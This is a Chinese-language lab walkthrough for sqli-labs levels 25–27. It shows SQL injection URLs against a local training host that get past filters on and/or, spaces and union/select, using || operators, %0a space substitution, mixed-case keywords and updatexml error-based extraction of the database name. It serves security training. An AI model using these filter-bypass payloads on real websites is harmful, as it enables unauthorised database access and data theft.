20、绕过去除and、or、union select、空格的sql注入

简介: 20、绕过去除and、or、union select、空格的sql注入

环境sqli-labs

less 25

1、输入特殊字符,报错

http://192.168.1.121/sqli/Less-25/?id=1

0a2653c851af460fa595bd959398a8f1.png

2、单引号闭合

0eacb84100b54626af849e6b562bf92a.png

3、输入and、or都会被过滤,报错,输入||正常,所以可以判断是大小写过滤

http://192.168.1.121/sqli/Less-25/?id=1’ and 1=1 --+

http://192.168.1.121/sqli/Less-25/?id=1’ or1=1 --+

2d65d23f6d4748949b924e4057485923.png

http://192.168.1.121/sqli/Less-25/?id=1’ || 1=1 --+

2e9b90b2ca334476abebe75bafe6eeaa.png

less 26

一、输入特殊字符,看报错信息

http://192.168.1.121/sqli/Less-26/?id=1

0a2653c851af460fa595bd959398a8f1.png

二、闭合语句没有效果,屏蔽了-,空格,or等等

http://192.168.1.121/sqli/Less-26/?id=1’ --+

三、重新构造闭合语句

http://192.168.1.121/sqli/Less-26/?id=1’ ||‘a’='a

0eacb84100b54626af849e6b562bf92a.png

这样就绕过了去空格

四、获取数据库名称

http://192.168.1.121/sqli/Less-26/?id=1’||updatexml(1,concat(’$’,(database())),0)||‘1’=‘1

2d65d23f6d4748949b924e4057485923.png

less 27

一、输入特殊字符,报错

http://192.168.1.121/sqli/Less-27/?id=1

0a2653c851af460fa595bd959398a8f1.png

二、由于过滤了特殊符号,构造如下闭合语句

http://192.168.1.121/sqli/Less-27/?id=1’ ||'1

0eacb84100b54626af849e6b562bf92a.png

三、通过union查询

http://192.168.1.121/sqli/Less-27/?id=1’ union select 1,2,3 ||'1

2d65d23f6d4748949b924e4057485923.png

union、select屏蔽了,空格也屏蔽了

四、union.select大小写替换一下,空格用/%0a/替换

http://192.168.1.121/sqli/Less-27/?id=0’/%0a/uniOn/%0a/seLect/%0a/1,2,3%20||'1

2e9b90b2ca334476abebe75bafe6eeaa.png

五、获取数据库名称

http://192.168.1.121/sqli/Less-27/?id=0’/%0a/uniOn/%0a/seLect/%0a/1,database(),3||'1

4cebaac233b3433da32a72337a77fc60.png

禁止非法,后果自负

目录
相关文章
|
2天前
|
SQL 运维 安全
WAF如何防御SQL注入?
【7月更文挑战第25天】WAF如何防御SQL注入?
21 9
|
2天前
|
SQL 安全 数据库
从入门到精通:Python Web安全守护指南,SQL注入、XSS、CSRF全防御!
【7月更文挑战第25天】在Python Web开发中确保应用安全至关重要。以下是针对SQL注入、XSS与CSRF攻击的防护策略及示例代码
19 6
|
2天前
|
SQL 安全 数据库
|
2天前
|
SQL 存储 安全
Python Web安全大挑战:面对SQL注入、XSS、CSRF,你准备好了吗?
【7月更文挑战第25天】在Python Web应用开发中,安全至关重要,需防范如SQL注入、XSS与CSRF等攻击。**SQL注入**风险可通过避免直接拼接用户输入至SQL语句,改用参数化查询来缓解。**XSS**则需对用户输入的内容进行HTML转义处理,防止恶意脚本执行。对于**CSRF**,实现包括生成并验证CSRF令牌在内的防护机制是关键。综合运用这些防御策略能显著增强应用的安全性,但需持续学习以对抗不断变化的威胁。
16 5
|
1天前
|
SQL 安全 Go
SQL注入不可怕,XSS也不难防!Python Web安全进阶教程,让你安心做开发!
【7月更文挑战第26天】在 Web 开发中, SQL 注入与 XSS 攻击常令人担忧, 但掌握正确防御策略可化解风险. 对抗 SQL 注入的核心是避免直接拼接用户输入至 SQL 语句. 使用 Python 的参数化查询 (如 sqlite3 库) 和 ORM 框架 (如 Django, SQLAlchemy) 可有效防范. 防范 XSS 攻击需严格过滤及转义用户输入. 利用 Django 模板引擎自动转义功能, 或手动转义及设置内容安全策略 (CSP) 来增强防护. 掌握这些技巧, 让你在 Python Web 开发中更加安心. 安全是个持续学习的过程, 不断提升才能有效保护应用.
7 1
|
1天前
|
SQL 安全 前端开发
Web安全新纪元:Python如何筑起SQL注入、XSS、CSRF的铜墙铁壁?
【7月更文挑战第26天】在Web开发中,安全性至关重要。Python提供强大工具来抵御SQL注入、XSS和CSRF等威胁。使用ORM如Django和SQLAlchemy可防SQL注入; Django等框架自动转义输出防XSS; CSRF通过自动及手动验证令牌来阻止。开发者须持续学习最新安全实践以保护用户数据。迈向Web安全新纪元,Python助你一臂之力。
7 1
|
8天前
|
SQL 分布式计算 资源调度
MaxCompute操作报错合集之执行SQL Union All操作时,数据类型产生报错,该怎么解决
MaxCompute是阿里云提供的大规模离线数据处理服务,用于大数据分析、挖掘和报表生成等场景。在使用MaxCompute进行数据处理时,可能会遇到各种操作报错。以下是一些常见的MaxCompute操作报错及其可能的原因与解决措施的合集。
|
6天前
|
SQL 存储 数据库
深入理解 SQL UNION 运算符及其应用场景
【7月更文挑战第8天】SQL UNION 概述 `UNION` 运算符结合多个`SELECT`语句,生成不含重复行的结果集。基本语法是:`SELECT...FROM table1 UNION SELECT...FROM table2`。适用于整合相同结构数据表、不同条件查询结果及跨数据库数据。注意列数和数据类型需匹配,排序规则一致,大量操作可能影响性能。示例:合并`Students_Math`和`Students_Science`表中`StudentID`和`Grade`的数据。